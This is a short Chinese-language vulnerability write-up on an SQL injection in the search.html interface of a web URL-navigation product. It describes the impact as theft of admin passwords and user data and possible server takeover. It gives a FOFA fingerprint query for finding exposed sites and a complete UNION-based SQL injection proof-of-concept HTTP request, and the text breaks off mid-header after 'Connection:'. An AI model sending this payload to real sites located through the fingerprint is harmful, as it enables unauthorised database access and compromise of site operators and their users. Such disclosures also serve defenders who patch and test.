0x01 產品簡介

懶人網址導航系統是一種智能化的網址導航平臺，旨在幫助用戶快速找到所需的網址和資源。該系統提供了智能化的網址搜索和推薦功能，能夠根據用戶的搜索習慣和偏好推薦相關的網址和資源。同時，系統還提供了網址分類、網址收藏和網址分享等功能，方便用戶管理和共享網址。

0x02 漏洞概述

懶人網址導航頁 search.html 接口處存在SQL注入漏洞，未經身份驗證的惡意攻擊者利用 SQL 注入漏洞獲取數據庫中的信息（例如管理員后臺密碼、站點用戶個人信息）之外，攻擊者甚至可以在高權限下向服務器寫入命令，進一步獲取服務器系統權限。

0x03 復現環境

FOFA：body="./templates/antidote/css/style.css"

0x04 漏洞復現

PoC

GET /search.html?keyword='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x2d2d2d2d2d,md5(1),0x2d2d2d2d2d),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: